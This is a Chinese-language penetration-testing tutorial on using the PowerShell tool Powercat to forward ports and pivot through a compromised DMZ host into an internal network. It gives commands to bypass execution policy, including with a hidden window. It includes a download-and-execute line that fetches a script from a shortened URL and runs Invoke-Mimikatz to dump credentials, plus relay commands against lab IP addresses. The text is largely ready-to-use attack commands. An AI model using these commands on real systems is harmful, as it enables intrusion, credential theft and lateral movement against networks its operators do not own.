实战中，我们也会遇到需要我们进行端口转发的情况，比如已经拿下的目标机1是在dmz区，而目标1所在内网的其他目标只能通过目标1去访问，这时候我们就需要端口转发或者代理来进行后渗透。这次就要介绍一个加强版的nc，基于powershell的后渗透工具

Powercat

下载地址:Lhttps://github.com/besimorhino/powercat

0x01 powercat准备

首先得改一下ps的执行脚本权限

Set-ExecutionPolicy Bypass

然后直接执行我们的powercat脚本即可。

也可以通过常规三种绕过执行策略的方式执行ps脚本

本地权限绕过

PowerShell.exe -ExecutionPolicy Bypass -File xxx.ps1

本地隐藏权限绕过执行脚本

PowerShell.exe -ExecutionPolicy Bypass -NoLogo -Nonlnteractive -NoProfile -WindowStyle Hidden(隐藏窗口) -File xxx.ps1

用IEX下载远程PS1脚本回来权限绕过执行

powershell "IEX (New-Object Net.WebClient).DownloadString('http://is.gd/oeoFuI');Invoke-Mimikatz-DumpCreds"

所以，直接选择最简单的吧，也别下载了，直接远程权限绕过,在Powershell 中执行:

IEX (New-Object System.Net.Webclient).DownloadString('https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1')

可以看到Powercat已经成功执行了

0x02 使用powercat端口转发

先来看下参数

不过端口转发中我们只需要其中几个参数

命令解析:

-c 指定一个ip地址

-p 指定一个端口

-v 显示详情

-l 监听模式，用于入站链接

-p 本地端口号

-e 程序重定向，跟nc一毛一样

-v 显示详情

下面用实际例子来说明每个参数的作用

例子一:

环境: 192.168.190.135  windows2003开放了3389(目标机)

192.168.190.149  windows8 (攻击机)

将192.168.190.135上的3389服务流量转发到本地的9001端口，攻击机用到的命令为:

powercat -c 192.168.190.135 -p 3389 -v -r tcp:9001

然后连接本地的9001端口，可以发现是转发成功的。

例子二:

环境: 192.168.190.135  windows2003开放了3389(内网目标机)

192.168.190.151  windows8 (外网目标机)(与内网目标机处一个内网)

192.168.190.149  windows8 (攻击机)

Ps:假设攻击机拿下了外网目标机的权限，想进一步内网渗透但是不能直接访问内网目标机的3389服务，只能通过外网目标机访问内网目标机的3389服务。

外网目标机执行:

powercat -c 192.168.190.135 -p 3389 -v -r tcp:6666

(连接内网目标机的3389端口,将流程转到自己的6666端口)

攻击机执行:

powercat -c 192.168.190.151 -p 6666 -v -r tcp:1111

(连接外网目标机的6666端口，把流程转到本地的1111端口)

可以看到转发成功。